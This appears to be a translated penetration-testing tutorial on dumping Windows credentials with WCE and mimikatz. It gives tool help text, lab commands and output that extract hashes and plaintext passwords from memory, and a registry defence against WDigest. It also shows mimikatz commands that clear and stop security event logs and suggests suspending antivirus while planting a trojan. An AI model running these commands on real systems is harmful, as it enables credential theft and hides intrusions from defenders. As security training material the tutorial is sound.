Privilege Escalation in Penetration Testing: Escalating Privileges with Related Tools
I. The Windows Authentication Process
After an account logs on to the target server/system, the WDigest security package keeps the plaintext password of the currently logged-on account in memory; it is removed only when the account logs off.
II. WCE (Windows Credentials Editor)
Windows Credentials Editor (WCE) is a powerful internal-network penetration tool for the Windows platform.
What it does
It can list logon sessions and add, change and delete the associated credentials (for example LM/NT hashes). In internal-network penetration these capabilities can be used, for example, to perform pass-the-hash on Windows or to obtain NT/LM hashes from memory (including those created by interactive logons, services and Remote Desktop connections) for further attacks. It can also show both the hashed and the plaintext form of the passwords of the users currently logged on to the system.
Requirements
Administrator privileges are required.
Installation
apt-get install wce
root@kali:/usr/share/windows-resources/wce# ls
getlsasrvaddr.exe README wce32.exe wce64.exe wce-universal.exe
Help
C:\wce>wce-universal.exe -h
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Options:
    -l          List logon sessions and NTLM credentials (default).
    -s          Changes NTLM credentials of current logon session.
                Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
    -r          Lists logon sessions and NTLM credentials indefinitely.
                Refreshes every 5 seconds if new sessions are found.
                Optional: -r<refresh interval>.
    -c          Run <cmd> in a new session with the specified NTLM credentials.
                Parameters: <cmd>.
    -e          Lists logon sessions NTLM credentials indefinitely.
                Refreshes every time a logon event occurs.
    -o          saves all output to a file.
                Parameters: <filename>.
    -i          Specify LUID instead of use current logon session.
                Parameters: <luid>.
    -d          Delete NTLM credentials from logon session.
                Parameters: <luid>.
    -a          Use Addresses.
                Parameters: <addresses>
    -f          Force 'safe mode'.
    -g          Generate LM & NT Hash.
                Parameters: <password>.
    -K          Dump Kerberos tickets to file (unix & 'windows wce' format)
    -k          Read Kerberos tickets from file and insert into Windows cache
    -w          Dump cleartext passwords stored by the digest authentication package
    -v          verbose output.
Parameters:
-l: show the password hashes of the currently logged-on accounts [lmhash:nthash]
-lv: show more detailed information [injection mode may damage system processes]
-r: re-read every few seconds to check whether new accounts have logged on (default 5 s).
-d: delete a session by specifying its LUID.
-g: compute the LM and NTLM hashes of a given password.
-w: read the plaintext passwords of the currently logged-on accounts that the WDigest security package keeps in memory.
Note: WCE reads from memory, whereas pwdump reads from the SAM database!
Examples
Copy the entire wce folder to the test machine (XP SP3 in this example), create several extra accounts on XP and, by switching users, leave each of them in a logged-on state.
Parameter -l:
Parameter -lv:
Parameter -r:
Log on as account a
Parameter -d:
Parameter -g:
Parameter -w:
Parameters -i + -s (modify the logon information of a specified session):
e.g. change a's logon session to the administrator account
III. Defending against WCE
Because the system keeps plaintext passwords in memory through the Digest Authentication Package, which is loaded by default, its default loading can be disabled in the registry.
Registry path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
Default entries of Security Packages:
- kerberos
- msv1_0
- schannel
- wdigest: keeps plaintext passwords in local memory
- tspkg: Remote Desktop (Terminal Services) keeps……
- pku2u
IV. Similar tools
1. pwdump
See: https://www.cnblogs.com/z9m8r8/articles/15892054.html
2. fgdump
Kali path: /usr/share/windows-binaries/fgdump
XP demo:
3. mimikatz
Kali path: /usr/share/windows-resources/mimikatz
Help information (use double colons to view command modules and sub-commands)
C:\Documents and Settings\Administrator\Desktop\mimikatz\Win32>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x86) #18362 May 13 2019 01:34:39
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # ::
ERROR mimikatz_doLocal ; "" module not found !

        standard  -  Standard module  [Basic commands (does not require module name)]
          crypto  -  Crypto Module
        sekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]
        kerberos  -  Kerberos package module  []
       privilege  -  Privilege module
         process  -  Process module
         service  -  Service module
         lsadump  -  LsaDump module
              ts  -  Terminal Server module
           event  -  Event module
            misc  -  Miscellaneous module
           token  -  Token manipulation module
           vault  -  Windows Vault/Credential module
     minesweeper  -  MineSweeper module
             net  -
           dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]
       busylight  -  BusyLight Module
          sysenv  -  System Environment Value module
             sid  -  Security Identifiers module
             iis  -  IIS XML Config module
             rpc  -  RPC control of mimikatz
            sr98  -  RF module for SR98 device and T5577 target
             rdm  -  RF module for RDM(830 AL) device
             acr  -  ACR Module
privilege module: privilege escalation
mimikatz # privilege::
ERROR mimikatz_doLocal ; "(null)" command of "privilege" module not found !

Module :        privilege
Full name :     Privilege module

          debug  -  Ask debug privilege
         driver  -  Ask load driver privilege
       security  -  Ask security privilege
            tcb  -  Ask tcb privilege
         backup  -  Ask backup privilege
        restore  -  Ask restore privilege
         sysenv  -  Ask system environment privilege
             id  -  Ask a privilege by its id
           name  -  Ask a privilege by its name

mimikatz # privilege::debug    # obtain the debug privilege
Privilege '20' OK
sekurlsa module: view logon account password information, etc.
mimikatz # sekurlsa::
ERROR mimikatz_doLocal ; "(null)" command of "sekurlsa" module not found !

Module :        sekurlsa
Full name :     SekurLSA module
Description :   Some commands to enumerate credentials...

            msv  -  Lists LM & NTLM credentials
        wdigest  -  Lists WDigest credentials
       kerberos  -  Lists Kerberos credentials
          tspkg  -  Lists TsPkg credentials
        livessp  -  Lists LiveSSP credentials
            ssp  -  Lists SSP credentials
 logonPasswords  -  Lists all available providers credentials
        process  -  Switch (or reinit) to LSASS process context
       minidump  -  Switch (or reinit) to LSASS minidump context
            pth  -  Pass-the-hash
         krbtgt  -  krbtgt!
    dpapisystem  -  DPAPI_SYSTEM secret
        tickets  -  List Kerberos tickets
          ekeys  -  List Kerberos Encryption Keys
          dpapi  -  List Cached MasterKeys
        credman  -  List Credentials Manager

mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 242726 (00000000:0003b426)
Session           : Interactive from 0
User Name         : Administrator
Domain            : DH-CA8822AB9589
Logon Server      : DH-CA8822AB9589
Logon Time        : 2/15/2022 9:14:59 AM
SID               : S-1-5-21-583907252-1757981266-1177238915-500
        msv :
         [00000002] Primary
         * Username : Administrator
         * Domain   : DH-CA8822AB9589
         * LM       : 44efce164ab921caaad3b435b51404ee
         * NTLM     : 32ed87bdb5fdc5e9cba88547376818d4
         * SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
        wdigest :
         * Username : Administrator
         * Domain   : DH-CA8822AB9589
         * Password : 123456
        kerberos :
         * Username : Administrator
         * Domain   : DH-CA8822AB9589
         * Password : 123456
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2/15/2022 9:08:41 AM
SID               : S-1-5-19
        msv :
…………………………
process module: process management
mimikatz # process::
ERROR mimikatz_doLocal ; "(null)" command of "process" module not found !

Module :        process
Full name :     Process module

           list  -  List process
        exports  -  List exports
        imports  -  List imports
          start  -  Start a process
           stop  -  Terminate a process
        suspend  -  Suspend a process
         resume  -  Resume a process
            run  -  Run!
           runp  -

mimikatz # process::start cmd
Trying to start "cmd" : OK ! (PID 3888)
service module: service management
mimikatz # service::
ERROR mimikatz_doLocal ; "(null)" command of "service" module not found !

Module :        service
Full name :     Service module

          start  -  Start service
         remove  -  Remove service
           stop  -  Stop service
        suspend  -  Suspend service
         resume  -  Resume service
    preshutdown  -  Preshutdown service
       shutdown  -  Shutdown service
           list  -  List services
              +  -  Install Me!
              -  -  Install Me!
             me  -  Me!
suspend sub-command: suspends a process; can be used to pause antivirus software when planting a trojan.
resume sub-command: resumes a process
lsadump module
mimikatz # lsadump::
ERROR mimikatz_doLocal ; "(null)" command of "lsadump" module not found !

Module :        lsadump
Full name :     LsaDump module

            sam  -  Get the SysKey to decrypt SAM entries (from registry or hives)
        secrets  -  Get the SysKey to decrypt SECRETS entries (from registry or hives)
          cache  -  Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)
            lsa  -  Ask LSA Server to retrieve SAM/AD entries (normal, patch on the fly or inject)
          trust  -  Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly)
     backupkeys  -
         rpdata  -
         dcsync  -  Ask a DC to synchronize an object
       dcshadow  -  They told me I could be anything I wanted, so I became a domain controller
        setntlm  -  Ask a server to set a new password/ntlm for one user
     changentlm  -  Ask a server to set a new password/ntlm for one user
        netsync  -  Ask a DC to send current and previous NTLM hash of DC/SRV/WKS
       packages  -

mimikatz # lsadump::sam    # read account password hashes from the SAM database
Domain : DH-CA8822AB9589
SysKey : 7be839f49edcab29c3a40fe24d47335f
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
ts module: Terminal Services; by default XP allows only one active logon session
It effectively applies a patch so that several sessions can run in parallel, i.e. multi-user logon.
event module: log management
mimikatz # event::
ERROR mimikatz_doLocal ; "(null)" command of "event" module not found !

Module :        event
Full name :     Event module

           drop  -  [experimental] patch Events service to avoid new events
          clear  -  Clear an event log

mimikatz # event::clear
Using "Security" event log :
- 0 event(s)
- Cleared !
- 1 event(s)

mimikatz # event::drop
clear: clears the recorded security log and other event logs
drop: stops new log entries from being recorded
misc module: miscellaneous
token module
mimikatz # token::
ERROR mimikatz_doLocal ; "(null)" command of "token" module not found !

Module :        token
Full name :     Token manipulation module

         whoami  -  Display current identity
           list  -  List all tokens of the system
        elevate  -  Impersonate a token
            run  -  Run!
         revert  -  Revert to proces token

mimikatz # token::whoami
 * Process Token : {0;0002ed48} 0 - 333441   DH-CA8822AB9589\Administrator   S-1-5-21-583907252-1757981266-1177238915-500   (08g,20p)   Primary
 * Thread Token  : no token